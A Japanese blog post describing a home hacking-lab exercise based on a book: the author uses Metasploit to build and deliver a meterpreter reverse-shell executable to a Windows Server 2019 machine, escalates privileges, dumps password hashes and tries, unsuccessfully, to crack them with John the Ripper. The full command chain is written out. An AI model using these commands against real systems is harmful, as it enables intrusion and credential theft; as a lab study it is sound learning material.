• /
    • セキュリティ /
  • MetasploitとJohn The Ripperでパスワード解析してみた(対象Win2019)

MetasploitとJohn The Ripperでパスワード解析してみた(対象Win2019)

参考文献:IPUSIRON著「ハッキング・ラボのつくりかた」

今回は上記書籍を参考にMetasploitとJohn The Ripperというツールを使って
Kali LinuxからリモートのWindows2019のパスワードハッシュを奪取して
ハッシュ解析を試みてみました。

1.環境
Kali Linux:192.168.0.15
Windows2019:192.168.0.25

2.手順

Kali側での操作

Metasploitの起動
msfconsole

show exploits

search type:payload reverse_tcp platform:windows


8   payload/windows/meterpreter/reverse_tcp  normal No  Windows Meterpreter (Reflective Injection),
     Reverse TCP Stager

55  payload/windows/x64/meterpreter/reverse_tcp  normal No  Windows Meterpreter (Reflective Injection x64),
 Windows x64 Reverse TCP Stager

で2種類ありますが、対象が64bitなのでx64の方を使用します。

evil64.exeの作成
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.15 -f exe -o /root/evil64.exe

cd /var/www/html
mkdir share
cp /root/evil64.exe share
chmod -R 755 share

service apache2 restart

Windows側から下記にアクセス
http://192.168.0.15/share/

evil64.exeが閲覧できることを確認する。

Kali側での操作

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.15
↑KaliのIPを指定します。

show options
LPORT 4444なのでport4444で待ち受けることがわかります。

exploit

Windows2019側の操作

http://192.168.0.15/share/ にアクセスして、evll64.exeをダウンロードして、Wクリックする。

Kali側でWindowsの操作ができるようになります。

Windowsのパスワードハッシュの取得
getuid
getsystem -t 1
getuid
run hashdump
run post/windows/gather/smart_hashdump GETSYSTEM=true
cp -p /root/.msf4/loot/20201231060733_default_192.168.0.25_windows.hashes_689472.txt /root/hash2.txt

john --wordlist=/usr/share/john/password.lst --format:NT hash2.txt
john --show --format:NT hash2.txt

Administratorのパスワードが空で表示されてしまいます。

著者のIPUSIRONさんにアドバイスを頂いて、下記も試すが結果変わらず。

rm /root/.john/john.pot
john --wordlist=/usr/share/john/password.lst hash2.txt
john --show hash2.txt
john --show --format:LM hash2.txt

https://www.mbsd.jp/blog/20190514.html

Retrieving NTLM Hashes and what changed in Windows 10

↑の記事より、2016年のWindows10 1607以降でNTLMのハッシュ暗号化方式がRC4からAESに変更になった為、
今のバージョンのmetasploitではWindows2019のハッシュ値が正しく取得できていないのではと思いました。
ハッシュ値が正しく取得できれば、john the ripperでハッシュ値からパスワードが解析できるようになるのではと思いました。

著者のIPUSIRONさんさんより今事象の見解を頂きました。

「コマンドにミスがなければ、以下のいずれかの可能性が高いと思いました。
①Windows Server 2019から正しい形でパスワードハッシュをダンプできていない。
②John the Ripperが(2019の)パスワードハッシュに非対応。
2019(あるいは新バージョン)で新しい仕組みになっていれば特に。

実際に試していないので何ともいえませんが、先のツイートで提示していただいたURLを読むと、①の可能性があるかもしれませんね。
②の可能性であれば、Johnのバージョンが上がれたうまくいくことが期待できる。
また、別のパスワードクラッカーでうまくいくかもしれないと思いました。
↓hashcatが対応しているパスワードハッシュの形式
https://hashcat.net/wiki/doku.php?id=example_hashes

①、②どちらかの理由でWindows2019のパスワード解析は現時点(2020/12/31)では
出来ないようです。」

3.まとめ
Win2019でのパスワード解析は失敗に終わりましたが、
何故できないのか?を調べる過程は良い経験になりました。
次は書籍通りにWin7で試してみたいと思います。

Comments are closed.